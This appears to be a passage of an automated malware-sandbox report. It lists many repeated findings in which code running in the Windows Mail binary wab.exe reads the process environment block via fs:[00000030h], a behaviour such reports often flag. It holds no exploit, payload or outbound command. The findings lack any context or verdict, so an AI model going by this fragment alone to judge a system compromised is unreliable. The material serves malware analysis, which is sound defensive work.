Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E9C073 mov eax, dword ptr fs:[00000030h]	1_2_02E9C073
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F1705E mov ebx, dword ptr fs:[00000030h]	1_2_02F1705E
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F1705E mov eax, dword ptr fs:[00000030h]	1_2_02F1705E
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E72050 mov eax, dword ptr fs:[00000030h]	1_2_02E72050
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E9B052 mov eax, dword ptr fs:[00000030h]	1_2_02E9B052
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E6A020 mov eax, dword ptr fs:[00000030h]	1_2_02E6A020
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E6C020 mov eax, dword ptr fs:[00000030h]	1_2_02E6C020
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F3903E mov eax, dword ptr fs:[00000030h]	1_2_02F3903E
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F3903E mov eax, dword ptr fs:[00000030h]	1_2_02F3903E
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F3903E mov eax, dword ptr fs:[00000030h]	1_2_02F3903E
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F3903E mov eax, dword ptr fs:[00000030h]	1_2_02F3903E
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E8E016 mov eax, dword ptr fs:[00000030h]	1_2_02E8E016
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E8E016 mov eax, dword ptr fs:[00000030h]	1_2_02E8E016
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E8E016 mov eax, dword ptr fs:[00000030h]	1_2_02E8E016
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E8E016 mov eax, dword ptr fs:[00000030h]	1_2_02E8E016
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E951EF mov eax, dword ptr fs:[00000030h]	1_2_02E951EF
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E951EF mov eax, dword ptr fs:[00000030h]	1_2_02E951EF
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E951EF mov eax, dword ptr fs:[00000030h]	1_2_02E951EF
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E951EF mov eax, dword ptr fs:[00000030h]	1_2_02E951EF
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E951EF mov eax, dword ptr fs:[00000030h]	1_2_02E951EF
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E951EF mov eax, dword ptr fs:[00000030h]	1_2_02E951EF
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E951EF mov eax, dword ptr fs:[00000030h]	1_2_02E951EF
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E951EF mov eax, dword ptr fs:[00000030h]	1_2_02E951EF
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E951EF mov eax, dword ptr fs:[00000030h]	1_2_02E951EF
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E951EF mov eax, dword ptr fs:[00000030h]	1_2_02E951EF
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E951EF mov eax, dword ptr fs:[00000030h]	1_2_02E951EF
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E951EF mov eax, dword ptr fs:[00000030h]	1_2_02E951EF
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E951EF mov eax, dword ptr fs:[00000030h]	1_2_02E951EF
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E751ED mov eax, dword ptr fs:[00000030h]	1_2_02E751ED
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F461E5 mov eax, dword ptr fs:[00000030h]	1_2_02F461E5
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EA01F8 mov eax, dword ptr fs:[00000030h]	1_2_02EA01F8
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F361C3 mov eax, dword ptr fs:[00000030h]	1_2_02F361C3
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F361C3 mov eax, dword ptr fs:[00000030h]	1_2_02F361C3
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EAD1D0 mov eax, dword ptr fs:[00000030h]	1_2_02EAD1D0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EAD1D0 mov ecx, dword ptr fs:[00000030h]	1_2_02EAD1D0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F451CB mov eax, dword ptr fs:[00000030h]	1_2_02F451CB
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F211A4 mov eax, dword ptr fs:[00000030h]	1_2_02F211A4
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F211A4 mov eax, dword ptr fs:[00000030h]	1_2_02F211A4
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F211A4 mov eax, dword ptr fs:[00000030h]	1_2_02F211A4
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F211A4 mov eax, dword ptr fs:[00000030h]	1_2_02F211A4
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E8B1B0 mov eax, dword ptr fs:[00000030h]	1_2_02E8B1B0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EB0185 mov eax, dword ptr fs:[00000030h]	1_2_02EB0185
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EF019F mov eax, dword ptr fs:[00000030h]	1_2_02EF019F
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EF019F mov eax, dword ptr fs:[00000030h]	1_2_02EF019F
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EF019F mov eax, dword ptr fs:[00000030h]	1_2_02EF019F
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EF019F mov eax, dword ptr fs:[00000030h]	1_2_02EF019F
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E6A197 mov eax, dword ptr fs:[00000030h]	1_2_02E6A197
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E6A197 mov eax, dword ptr fs:[00000030h]	1_2_02E6A197
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E6A197 mov eax, dword ptr fs:[00000030h]	1_2_02E6A197
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F2C188 mov eax, dword ptr fs:[00000030h]	1_2_02F2C188
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F2C188 mov eax, dword ptr fs:[00000030h]	1_2_02F2C188
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F09179 mov eax, dword ptr fs:[00000030h]	1_2_02F09179
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E6F172 mov eax, dword ptr fs:[00000030h]	1_2_02E6F172
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E6F172 mov eax, dword ptr fs:[00000030h]	1_2_02E6F172
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E6F172 mov eax, dword ptr fs:[00000030h]	1_2_02E6F172
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E6F172 mov eax, dword ptr fs:[00000030h]	1_2_02E6F172
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E6F172 mov eax, dword ptr fs:[00000030h]	1_2_02E6F172
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E6F172 mov eax, dword ptr fs:[00000030h]	1_2_02E6F172
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E6F172 mov eax, dword ptr fs:[00000030h]	1_2_02E6F172
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E6F172 mov eax, dword ptr fs:[00000030h]	1_2_02E6F172
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E6F172 mov eax, dword ptr fs:[00000030h]	1_2_02E6F172
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E6F172 mov eax, dword ptr fs:[00000030h]	1_2_02E6F172
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E6F172 mov eax, dword ptr fs:[00000030h]	1_2_02E6F172
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E6F172 mov eax, dword ptr fs:[00000030h]	1_2_02E6F172
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E6F172 mov eax, dword ptr fs:[00000030h]	1_2_02E6F172
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E6F172 mov eax, dword ptr fs:[00000030h]	1_2_02E6F172
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E6F172 mov eax, dword ptr fs:[00000030h]	1_2_02E6F172
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E6F172 mov eax, dword ptr fs:[00000030h]	1_2_02E6F172
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E6F172 mov eax, dword ptr fs:[00000030h]	1_2_02E6F172
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E6F172 mov eax, dword ptr fs:[00000030h]	1_2_02E6F172
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E6F172 mov eax, dword ptr fs:[00000030h]	1_2_02E6F172
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E6F172 mov eax, dword ptr fs:[00000030h]	1_2_02E6F172
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E6F172 mov eax, dword ptr fs:[00000030h]	1_2_02E6F172
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F45152 mov eax, dword ptr fs:[00000030h]	1_2_02F45152
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E69148 mov eax, dword ptr fs:[00000030h]	1_2_02E69148
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E69148 mov eax, dword ptr fs:[00000030h]	1_2_02E69148
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E69148 mov eax, dword ptr fs:[00000030h]	1_2_02E69148
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E69148 mov eax, dword ptr fs:[00000030h]	1_2_02E69148
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E6C156 mov eax, dword ptr fs:[00000030h]	1_2_02E6C156
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E76154 mov eax, dword ptr fs:[00000030h]	1_2_02E76154
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E76154 mov eax, dword ptr fs:[00000030h]	1_2_02E76154
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F04144 mov eax, dword ptr fs:[00000030h]	1_2_02F04144
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F04144 mov eax, dword ptr fs:[00000030h]	1_2_02F04144
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F04144 mov ecx, dword ptr fs:[00000030h]	1_2_02F04144
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F04144 mov eax, dword ptr fs:[00000030h]	1_2_02F04144
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F04144 mov eax, dword ptr fs:[00000030h]	1_2_02F04144
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E77152 mov eax, dword ptr fs:[00000030h]	1_2_02E77152
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EA0124 mov eax, dword ptr fs:[00000030h]	1_2_02EA0124
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E6B136 mov eax, dword ptr fs:[00000030h]	1_2_02E6B136
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E6B136 mov eax, dword ptr fs:[00000030h]	1_2_02E6B136
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E6B136 mov eax, dword ptr fs:[00000030h]	1_2_02E6B136
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E6B136 mov eax, dword ptr fs:[00000030h]	1_2_02E6B136
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E71131 mov eax, dword ptr fs:[00000030h]	1_2_02E71131
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E71131 mov eax, dword ptr fs:[00000030h]	1_2_02E71131
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F30115 mov eax, dword ptr fs:[00000030h]	1_2_02F30115
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F1A118 mov ecx, dword ptr fs:[00000030h]	1_2_02F1A118
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F1A118 mov eax, dword ptr fs:[00000030h]	1_2_02F1A118
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F1A118 mov eax, dword ptr fs:[00000030h]	1_2_02F1A118
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F1A118 mov eax, dword ptr fs:[00000030h]	1_2_02F1A118
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F2D6F0 mov eax, dword ptr fs:[00000030h]	1_2_02F2D6F0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E9D6E0 mov eax, dword ptr fs:[00000030h]	1_2_02E9D6E0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E9D6E0 mov eax, dword ptr fs:[00000030h]	1_2_02E9D6E0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EEE6F2 mov eax, dword ptr fs:[00000030h]	1_2_02EEE6F2
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EEE6F2 mov eax, dword ptr fs:[00000030h]	1_2_02EEE6F2
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EEE6F2 mov eax, dword ptr fs:[00000030h]	1_2_02EEE6F2
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EEE6F2 mov eax, dword ptr fs:[00000030h]	1_2_02EEE6F2
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EF06F1 mov eax, dword ptr fs:[00000030h]	1_2_02EF06F1
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EF06F1 mov eax, dword ptr fs:[00000030h]	1_2_02EF06F1
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F036EE mov eax, dword ptr fs:[00000030h]	1_2_02F036EE
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F036EE mov eax, dword ptr fs:[00000030h]	1_2_02F036EE
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F036EE mov eax, dword ptr fs:[00000030h]	1_2_02F036EE
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F036EE mov eax, dword ptr fs:[00000030h]	1_2_02F036EE
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F036EE mov eax, dword ptr fs:[00000030h]	1_2_02F036EE
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F036EE mov eax, dword ptr fs:[00000030h]	1_2_02F036EE
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EA16CF mov eax, dword ptr fs:[00000030h]	1_2_02EA16CF
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E7B6C0 mov eax, dword ptr fs:[00000030h]	1_2_02E7B6C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E7B6C0 mov eax, dword ptr fs:[00000030h]	1_2_02E7B6C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E7B6C0 mov eax, dword ptr fs:[00000030h]	1_2_02E7B6C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E7B6C0 mov eax, dword ptr fs:[00000030h]	1_2_02E7B6C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E7B6C0 mov eax, dword ptr fs:[00000030h]	1_2_02E7B6C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E7B6C0 mov eax, dword ptr fs:[00000030h]	1_2_02E7B6C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EAA6C7 mov ebx, dword ptr fs:[00000030h]	1_2_02EAA6C7
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EAA6C7 mov eax, dword ptr fs:[00000030h]	1_2_02EAA6C7
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F2F6C7 mov eax, dword ptr fs:[00000030h]	1_2_02F2F6C7
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F316CC mov eax, dword ptr fs:[00000030h]	1_2_02F316CC
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F316CC mov eax, dword ptr fs:[00000030h]	1_2_02F316CC
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F316CC mov eax, dword ptr fs:[00000030h]	1_2_02F316CC
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F316CC mov eax, dword ptr fs:[00000030h]	1_2_02F316CC
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E6D6AA mov eax, dword ptr fs:[00000030h]	1_2_02E6D6AA
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E6D6AA mov eax, dword ptr fs:[00000030h]	1_2_02E6D6AA
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EAC6A6 mov eax, dword ptr fs:[00000030h]	1_2_02EAC6A6
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E676B2 mov eax, dword ptr fs:[00000030h]	1_2_02E676B2
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E676B2 mov eax, dword ptr fs:[00000030h]	1_2_02E676B2
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E676B2 mov eax, dword ptr fs:[00000030h]	1_2_02E676B2
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EA66B0 mov eax, dword ptr fs:[00000030h]	1_2_02EA66B0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EF368C mov eax, dword ptr fs:[00000030h]	1_2_02EF368C
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EF368C mov eax, dword ptr fs:[00000030h]	1_2_02EF368C
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EF368C mov eax, dword ptr fs:[00000030h]	1_2_02EF368C
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EF368C mov eax, dword ptr fs:[00000030h]	1_2_02EF368C
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E74690 mov eax, dword ptr fs:[00000030h]	1_2_02E74690
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E74690 mov eax, dword ptr fs:[00000030h]	1_2_02E74690
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EAA660 mov eax, dword ptr fs:[00000030h]	1_2_02EAA660
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EAA660 mov eax, dword ptr fs:[00000030h]	1_2_02EAA660
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EA9660 mov eax, dword ptr fs:[00000030h]	1_2_02EA9660
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EA9660 mov eax, dword ptr fs:[00000030h]	1_2_02EA9660
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F3866E mov eax, dword ptr fs:[00000030h]	1_2_02F3866E
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F3866E mov eax, dword ptr fs:[00000030h]	1_2_02F3866E
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EA2674 mov eax, dword ptr fs:[00000030h]	1_2_02EA2674
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E8C640 mov eax, dword ptr fs:[00000030h]	1_2_02E8C640
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E6F626 mov eax, dword ptr fs:[00000030h]	1_2_02E6F626
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E6F626 mov eax, dword ptr fs:[00000030h]	1_2_02E6F626
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E6F626 mov eax, dword ptr fs:[00000030h]	1_2_02E6F626
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E6F626 mov eax, dword ptr fs:[00000030h]	1_2_02E6F626
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E6F626 mov eax, dword ptr fs:[00000030h]	1_2_02E6F626
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E6F626 mov eax, dword ptr fs:[00000030h]	1_2_02E6F626
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E6F626 mov eax, dword ptr fs:[00000030h]	1_2_02E6F626
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E6F626 mov eax, dword ptr fs:[00000030h]	1_2_02E6F626
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E6F626 mov eax, dword ptr fs:[00000030h]	1_2_02E6F626
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F45636 mov eax, dword ptr fs:[00000030h]	1_2_02F45636
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EA6620 mov eax, dword ptr fs:[00000030h]	1_2_02EA6620
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EA8620 mov eax, dword ptr fs:[00000030h]	1_2_02EA8620
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E7262C mov eax, dword ptr fs:[00000030h]	1_2_02E7262C
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E8E627 mov eax, dword ptr fs:[00000030h]	1_2_02E8E627
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E8260B mov eax, dword ptr fs:[00000030h]	1_2_02E8260B
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E8260B mov eax, dword ptr fs:[00000030h]	1_2_02E8260B
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E8260B mov eax, dword ptr fs:[00000030h]	1_2_02E8260B
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E8260B mov eax, dword ptr fs:[00000030h]	1_2_02E8260B
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E8260B mov eax, dword ptr fs:[00000030h]	1_2_02E8260B
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E8260B mov eax, dword ptr fs:[00000030h]	1_2_02E8260B
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E8260B mov eax, dword ptr fs:[00000030h]	1_2_02E8260B
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EEE609 mov eax, dword ptr fs:[00000030h]	1_2_02EEE609
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EAF603 mov eax, dword ptr fs:[00000030h]	1_2_02EAF603
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EA1607 mov eax, dword ptr fs:[00000030h]	1_2_02EA1607
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E73616 mov eax, dword ptr fs:[00000030h]	1_2_02E73616
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E73616 mov eax, dword ptr fs:[00000030h]	1_2_02E73616
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EB2619 mov eax, dword ptr fs:[00000030h]	1_2_02EB2619
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E927ED mov eax, dword ptr fs:[00000030h]	1_2_02E927ED
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E927ED mov eax, dword ptr fs:[00000030h]	1_2_02E927ED
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E927ED mov eax, dword ptr fs:[00000030h]	1_2_02E927ED
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E7D7E0 mov ecx, dword ptr fs:[00000030h]	1_2_02E7D7E0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E747FB mov eax, dword ptr fs:[00000030h]	1_2_02E747FB
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E747FB mov eax, dword ptr fs:[00000030h]	1_2_02E747FB
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E7C7C0 mov eax, dword ptr fs:[00000030h]	1_2_02E7C7C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E757C0 mov eax, dword ptr fs:[00000030h]	1_2_02E757C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E757C0 mov eax, dword ptr fs:[00000030h]	1_2_02E757C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E757C0 mov eax, dword ptr fs:[00000030h]	1_2_02E757C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EFF7AF mov eax, dword ptr fs:[00000030h]	1_2_02EFF7AF
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EFF7AF mov eax, dword ptr fs:[00000030h]	1_2_02EFF7AF
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EFF7AF mov eax, dword ptr fs:[00000030h]	1_2_02EFF7AF
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EFF7AF mov eax, dword ptr fs:[00000030h]	1_2_02EFF7AF
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EFF7AF mov eax, dword ptr fs:[00000030h]	1_2_02EFF7AF
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F437B6 mov eax, dword ptr fs:[00000030h]	1_2_02F437B6
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EF97A9 mov eax, dword ptr fs:[00000030h]	1_2_02EF97A9
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E707AF mov eax, dword ptr fs:[00000030h]	1_2_02E707AF
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E9D7B0 mov eax, dword ptr fs:[00000030h]	1_2_02E9D7B0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E6F7BA mov eax, dword ptr fs:[00000030h]	1_2_02E6F7BA
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E6F7BA mov eax, dword ptr fs:[00000030h]	1_2_02E6F7BA
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E6F7BA mov eax, dword ptr fs:[00000030h]	1_2_02E6F7BA
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E6F7BA mov eax, dword ptr fs:[00000030h]	1_2_02E6F7BA
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E6F7BA mov eax, dword ptr fs:[00000030h]	1_2_02E6F7BA
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E6F7BA mov eax, dword ptr fs:[00000030h]	1_2_02E6F7BA
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E6F7BA mov eax, dword ptr fs:[00000030h]	1_2_02E6F7BA
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E6F7BA mov eax, dword ptr fs:[00000030h]	1_2_02E6F7BA
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E6F7BA mov eax, dword ptr fs:[00000030h]	1_2_02E6F7BA
